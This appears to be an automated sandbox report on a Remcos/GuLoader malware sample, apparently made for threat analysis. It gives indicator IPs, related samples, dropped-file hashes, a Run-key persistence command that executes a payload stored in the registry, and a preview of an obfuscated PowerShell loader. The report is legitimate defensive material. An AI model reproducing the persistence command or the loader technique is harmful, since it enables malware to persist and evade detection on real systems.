        http://crl.microv | powershell.exe, 00000001.00000002.3356692851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.3348576807.0000000004C01000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.3348576807.0000000004D56000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | Vaccinerende.exe, 0000000E.00000002.3385658786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
        http://www.ebuddy.com | Vaccinerende.exe, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | unknown

        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
        192.3.220.22 | unknown | United States | | 36352 | AS-COLOCROSSINGUS | false
        107.173.4.16 | unknown | United States | | 36352 | AS-COLOCROSSINGUS | true
        178.237.33.50 | geoplugin.net | Netherlands | | 8455 | ATOM86-ASATOM86NL | false

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1522631
                    Start date and time:2024-09-30 13:56:05 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 54s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:22
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                    Detection:MAL
                    Classification:mal100.phis.troj.spyw.evad.winEXE@24/22@1/3
                    EGA Information:
                    • Successful, ratio: 83.3%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 238
                    • Number of non-executed functions: 217
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 6284 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size exceeded maximum capacity and may have missing network information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

        Time | Type | Description
        07:57:12 | API Interceptor | 40x Sleep call for process: powershell.exe modified
        08:00:22 | API Interceptor | 257689x Sleep call for process: Vaccinerende.exe modified
        12:59:45 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chivey57 %Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)
        12:59:53 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chivey57 %Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)

        Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
        192.3.220.22 | PO 11001 .xls | Get hash | malicious | Remcos, GuLoader | Browse | 192.3.220.22/hFXELFSwRHRwqbE214.bin
        107.173.4.16 | PO 11001 .xls | Get hash | malicious | Remcos, GuLoader | Browse |
         | SDWLLRJcsY.exe | Get hash | malicious | Remcos, GuLoader | Browse |
         | RFQ-948563836483638563735435376354.xls | Get hash | malicious | Remcos, GuLoader | Browse |
         | xNfDl1NeaI.exe | Get hash | malicious | Remcos, GuLoader | Browse |
         | GFqY91CTOZ.hta | Get hash | malicious | Cobalt Strike, Remcos, GuLoader | Browse |
         | Mcib4Llptj.exe | Get hash | malicious | Remcos | Browse |
         | SecuriteInfo.com.W64.GenKryptik.MAGC.tr.15181.21426.exe | Get hash | malicious | Remcos | Browse |
         | 2NyX8R4CZo.exe | Get hash | malicious | Remcos | Browse |
         | wcNDx6MT9O.exe | Get hash | malicious | Remcos | Browse |
         | 1Ccw7uyuFv.exe | Get hash | malicious | Remcos | Browse |
        178.237.33.50 | z1Quotation.scr.exe | Get hash | malicious | Remcos, GuLoader | Browse | geoplugin.net/json.gp
         | V1ljXRn7Yo.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
         | Invoice and packing list (021)_pdf.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
         | PO 11001 .xls | Get hash | malicious | Remcos, GuLoader | Browse | geoplugin.net/json.gp
         | ZIXBhdgf6y.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
         | yVhGfho0R4.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
         | C6DAEyTs7d.rtf | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        oi2BC6zhUY.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp

Match | Associated Sample Name / URL | Detection | Threat Name | Context
geoplugin.net | z1Quotation.scr.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | V1ljXRn7Yo.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | Invoice and packing list (021)_pdf.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | PO 11001 .xls | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | ZIXBhdgf6y.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | yVhGfho0R4.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | C6DAEyTs7d.rtf | malicious | Remcos | 178.237.33.50
geoplugin.net | SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtf | malicious | Remcos | 178.237.33.50
geoplugin.net | dvswiftsend_240917122612_9331095243.docx.doc | malicious | Remcos | 178.237.33.50
geoplugin.net | oi2BC6zhUY.exe | malicious | Remcos | 178.237.33.50

Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-COLOCROSSINGUS | PI#0034250924.xla.xlsx | malicious | FormBook | 104.168.7.7
AS-COLOCROSSINGUS | SYSN ORDER.xls | malicious | Snake Keylogger | 172.245.123.6
AS-COLOCROSSINGUS | PI#0034250924.xla.xlsx | malicious | Unknown | 104.168.7.7
AS-COLOCROSSINGUS | PI#0034250924.xla.xlsx | malicious | Unknown | 104.168.7.7
AS-COLOCROSSINGUS | PO 11001 .xls | malicious | Remcos, GuLoader | 107.173.4.16
AS-COLOCROSSINGUS | ZIXBhdgf6y.exe | malicious | Remcos | 192.3.101.137
AS-COLOCROSSINGUS | http://jeevankiranfoundationcenter.co.in/css/rrp.htm | malicious | Kutaki | 23.94.221.14
AS-COLOCROSSINGUS | C6DAEyTs7d.rtf | malicious | Remcos | 104.168.32.148
AS-COLOCROSSINGUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtf | malicious | PureLog Stealer | 107.172.130.147
AS-COLOCROSSINGUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf | malicious | Remcos | 192.3.101.29
ATOM86-ASATOM86NL | z1Quotation.scr.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | V1ljXRn7Yo.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Invoice and packing list (021)_pdf.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | PO 11001 .xls | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | ZIXBhdgf6y.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | yVhGfho0R4.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | C6DAEyTs7d.rtf | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtf | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | dvswiftsend_240917122612_9331095243.docx.doc | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | oi2BC6zhUY.exe | malicious | Remcos | 178.237.33.50
                                        No context

Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\Vaccinerende.exe | PO 11001 .xls | malicious | Remcos, GuLoader |
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Mini DuMP crash report, 14 streams, Mon Sep 30 12:01:07 2024, 0x1205a4 type
                                          Category:dropped
                                          Size (bytes):111362
                                          Entropy (8bit):2.1215395337505636
                                          Encrypted:false
                                          SSDEEP:768:IhVhaH9/IKlfzerUuYdV7YnjBQMBtwLhzhh2F6rjz:IhVkdIrz8FYnBBiLhtoFWjz
                                          MD5:B070E38105BEC63E14A63BDD8176668A
                                          SHA1:076D5DC57E46DE4DF88C025F78B9A6FF39822FF7
                                          SHA-256:B27A0D63877D6AC6C4AF1FEAC92EDC36CD1F21E5CE803098390D002CA428A78D
                                          SHA-512:33926FCDCA2B07AAF7A6B8B30895D09222E8C9F05650BFD01E838EBF6413C3DE9346EA0ABDED14FEB79953A4BDDD10BF0AD534994F10DB6B18D7980B776FC350
                                          Malicious:false
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):6352
                                          Entropy (8bit):3.718172247130993
                                          Encrypted:false
                                          SSDEEP:192:R6l7wVeJpJ5t6z5Y2duKprl89blb8sfi8/jm:R6lXJpHt6NY2du1lbPfT6
                                          MD5:F06FB4FF38B71C73BEE14CCB543543E0
                                          SHA1:F9B81777C8DD8635933C535007857046676A3B16
                                          SHA-256:BD08BC34A6E8A8EC2FC2DECDE0418000FE7DDA593689520FAB3A6B5AF0312F86
                                          SHA-512:C3C7EBA543197F01B157A5D24C4E80D80009AB3160D9A1EFE5524FB531AED3A8B568D007AD9C6F78F5707D0A0F106308FCAD2FCD8FF8DEE37A40C8EADA02ED34
                                          Malicious:false
                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.1.6.<./.P.i.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4597
                                          Entropy (8bit):4.447850219967562
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zsiiJg77aI9/AjrvWpW8VYsYm8M4J5U1qu1nFt+q8q171H65FtfKAaDa1:uIjfLI75Ajr+7V4JyndzViPfK5ufd
                                          MD5:3B54A03AE56EE41EF3BCEC853B4006C0
                                          SHA1:CC773CF2C9BD63A4A358B25F4ED2A5438A0CEFCB
                                          SHA-256:8E672D0A2EE0AB812C0BF178B6CF60F27A430A3E3475F9B6EBA295CB4128074F
                                          SHA-512:9025D6EF1FFAD6E2EC3247B9A780CB12B230CAE77D630ED14C5D6C15D1DE62D209819599124BA0A3DEF4F9B1C83F0573AF03EBA581EF023119AA2A271A73E2AB
                                          Malicious:false
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="522903" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                          Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):962
                                          Entropy (8bit):5.013811273052389
                                          Encrypted:false
                                          SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                          MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                          SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                          SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                          SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                          Malicious:false
                                          Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):14744
                                          Entropy (8bit):4.992175361088568
                                          Encrypted:false
                                          SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                          MD5:A35685B2B980F4BD3C6FD278EA661412
                                          SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                          SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                          SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                          Malicious:false
                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Category:dropped
                                          Size (bytes):990768
                                          Entropy (8bit):6.298838855552093
                                          Encrypted:false
                                          SSDEEP:12288:5Ly0W0exb+S7/6eALmQXhts30QmskXnnAEkINz3WSVgl:5Ly05wCmQXw30Ek3AgNz3Sl
                                          MD5:450228D72F9F726B645C55BBBC6DB905
                                          SHA1:B26075C51A4681F2FF7407188F5E9480545A7ACA
                                          SHA-256:9124D7696D2B94E7959933C3F7A8F68E61A5CE29CD5934A4D0379C2193B126BE
                                          SHA-512:4795D090447D237CBE1A044FFE78E8CD0C9BE358DF778673B4713EAB2C324056A7701D22B827B95B2413845089FA71AC81A4F47CC8BCDBABAD34845E64B4E090
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 24%
                                          • Antivirus: Virustotal, Detection: 33%, Browse
                                          Joe Sandbox View:
                                          • Filename: PO 11001 .xls, Detection: malicious, Browse
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
                                          Category:dropped
                                          Size (bytes):15728640
                                          Entropy (8bit):0.10805027086476268
                                          Encrypted:false
                                          SSDEEP:1536:+SB2jpSB2jFSjlK/Qw/ZweshzbOlqVqmesAzbIBl73esleszO/Z4zbU/L:+a6aOUueqVRIBYvOU
                                          MD5:9F6FBA8CABF6D4ECDD5B285F375D352B
                                          SHA1:ED0D370573441F24C1FEF0F1D7A92DB58AA484D8
                                          SHA-256:4C764E2DF9F41B915772A2259A958DB29E6476693225882D1FBAE286C22AFB41
                                          SHA-512:75C78BF6271DBDFE3A044ADF75F84AF49867E63BD614F0A300A676A73A736432C16C2DA686177B01E01BE6018178CCD060FB009DA012AD876BFD632833046A0C
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                          Category:dropped
                                          Size (bytes):2
                                          Entropy (8bit):1.0
                                          Encrypted:false
                                          SSDEEP:3:Qn:Qn
                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                          Malicious:false
                                          Preview:..
                                          Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                          Category:dropped
                                          Size (bytes):2
                                          Entropy (8bit):1.0
                                          Encrypted:false
                                          SSDEEP:3:Qn:Qn
                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                          Malicious:false
                                          Preview:..
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          File Type:ASCII text, with very long lines (3095), with CRLF, LF line terminators
                                          Category:dropped
                                          Size (bytes):53853
                                          Entropy (8bit):5.3041850938045645
                                          Encrypted:false
                                          SSDEEP:1536:Yb2DFjNKjwJJCwZuTEaiwLAm7C24yWjc2:YSrvJEwZtwM6qg2
                                          MD5:552ED0904239D64DB1895620B38DC799
                                          SHA1:8A6A6C6EFD31B04C716CDE1783B45783F2843E20
                                          SHA-256:D4D98FDBE306D61986BED62340744554E0A288C5A804ED5C924F66885CBF3514
                                          SHA-512:21F283AC39223437470036EC08EB01BF40C4A0C45EA5B94BB4D902CF66923DB4D14641CE68370D240AB2B213527552DFDE13EB1FF4B21A0BBF0C1EE6AED7ADE7
                                          Malicious:true
                                          Preview:$Overofficered=$Messingflaskers;..<#Skridende Voldgifternes Holdet Kharijite himmerigsmundfuld Paraphernalian Overtallets #>..<#Sprngsikreste Farvebilleder Presentation cervix Throughcome #>..<#Monepiscopal Lnrelation Unresponsibly Dekompressionsventil Xerographer Outset #>..<#Ligbrnding Ligustrenes Snedkereres Sarkasmernes Transformism Gennembladet Attackable #>..<#Altertavlens Arsenets Indeks #>..<#Reconciliative Pimpet Efteraarene Saxonic Thornton Chumpish Reservistens #>...$Bygmestres = @'.Woyaw.Promi$ CalidTreleiR,gioaM.sogl store KartkMetabtJ gtloPetrol regeo upeg aioc= Sque$ artinKendse illau Pi,trAnx oaMe.lsdReoxi;ud ty.Noncof.eathu Shikn,runkc V umtDistri,aghjoParadn O.ga MiraS xploa dornmStr tmSidewePol.dnTapethsi,mefRetrit,nergePeramrYo.im Skos(ghoul$ PaasV.aturiFollosTelefeGen er Nethe Ekstd ugeneTematsMekan, Resu$.isefPPresyoHotpllGdnineSinkem murro WintnPol oiUgleruAnomamBefor)Parag ri sw{Resho.Shoya.Tnkem$PropoOKammep Ru kvA chskSeneskSylloeMindstVivis1Carri4vandd9Str
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):385193
                                          Entropy (8bit):1.2513468259126719
                                          Encrypted:false
                                          SSDEEP:768:aEMZI3FIfIoASNikk5oeF4qQ7kjt8IrwghWyIgttkVVaxtWJjwHwUZJLPS/UpQFs:4IM85MQZxPWpILCm58b9QeiKhsRR7U
                                          MD5:C73A822A5DC42DEF82529419505D4D34
                                          SHA1:2F09CC0773FD145E60C4C20F9B8085624D0960A6
                                          SHA-256:99EECD9B8808E7B171AE3B9E08B1EFE75CBA0BAFDE4ECF1D240A2BA1F28EC637
                                          SHA-512:C6AAE8D60B43A7D7D1C287F70D91B35E914B0B4C53449B34D3E9D773C7909395755D9266FC4BA88648BC4E94614E550877D1DF54CB7547274D3EEA35ECFAA910
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):413966
                                          Entropy (8bit):1.2545701143598162
                                          Encrypted:false
                                          SSDEEP:1536:b2T3E/ySYfBk8nalEPTUh6Va4fPKCPdsqNQj:ij9fBk8alsUhH8js6c
                                          MD5:2563D98DE6469D9979963EFD8D66736D
                                          SHA1:4D98E68617BE777AB97514BDF59CA98AA1102C5F
                                          SHA-256:B7423FE1148A2EA0E5BDE3855DFAB272400202AD01A2402F76E6E5F7DD5E0AE5
                                          SHA-512:C3FDB8870482B6C1A08A3088ED4539746E4F5DFAF63C8AD5F7B7873D2F3FC4FE8945493888422C487F5DB1E216A289A431890E6100A1A10C4ED6BCB2DD8CBBA4
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):257970
                                          Entropy (8bit):1.256808441775652
                                          Encrypted:false
                                          SSDEEP:1536:KcEgmiyf7PGBgwWjC81son6i0q8s0If3y:WDLGoB0q8K3
                                          MD5:9F966EC38C037968BA52C7C6A58EAED1
                                          SHA1:31BC370E88A2A10950D4C3AE24C28DF7E2D89868
                                          SHA-256:B4B70294B142D598F5E391EE8D371014C4AEFA8272754CE0094A8F802ADFA1DA
                                          SHA-512:6DE9F14B990B44336B01DF665F6D1C46B6076C10F1CC40D45DAA009110D9BA51E871599422E486E7264FE251EC560E9922CB959DAE6C6B12CC8B6AF6D720C581
                                          Malicious:false
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          File Type:ASCII text, with very long lines (359), with no line terminators
                                          Category:dropped
                                          Size (bytes):359
                                          Entropy (8bit):4.308814426836422
                                          Encrypted:false
                                          SSDEEP:6:BSX8gnAA04KQeCVNcTKwLD3YAP7bqJINNQUmAdlvKRScZRIOrSeNRRAAefDPJzMA:wdAAMAszL8vJaNFmO0RSGDHRCNYR02yR
                                          MD5:2F193BC3BEEF5356ACF62CB12C2C4EF8
                                          SHA1:6E868DFB3D7ACB1D2C56E0EFA292CD7CF0DEC661
                                          SHA-256:10F1E86374C489E6FFC58B8213423687440ADDC3E483F5C84BE1F34D5DA23754
                                          SHA-512:4D5A2B7BD1C9A034A9A481BAA6C6D5D530AF5B3F95C8B1028C4DAB96FFA6199071E30CF1EB462B790AC845AA8BEAE34A0800741FBAC10242A3F38904593200EB
                                          Malicious:false
                                          Preview:succesforfattere homogamous monkeyishly funktionsstarts phylactolaemata.sextodecimos danmarkspremiere marrietta ancience.brisks grippelike hulebeboere flovmnds retrterne,roxbury marmorgulvets apogamic delprogrammers pips,selvglad polyhistorian flunkeyish deklasserings gidjee regnskabsinformationens,plasma anstandsdamernes pompejansk afmnstre afstbningernes,
                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):358391
                                          Entropy (8bit):7.608272187839353
                                          Encrypted:false
                                          SSDEEP:6144:6sUrRFXb4UwLDUxrycWgPzYnSH5F5vMu9wSvgzp3EWEFAWZS67RzFEQDnaV9m:TUFyiecWgP8SZrkuC9d3EWEmU+c29m
                                          MD5:14C1D52F24F29389597B36DCFC90B95A
                                          SHA1:A2578253F17B5F0EF989965DCB74AEBB60763B2D
                                          SHA-256:F9B744D0223EFE3C01C94D526881A95523C2F5E457F03774DD1D661944E60852
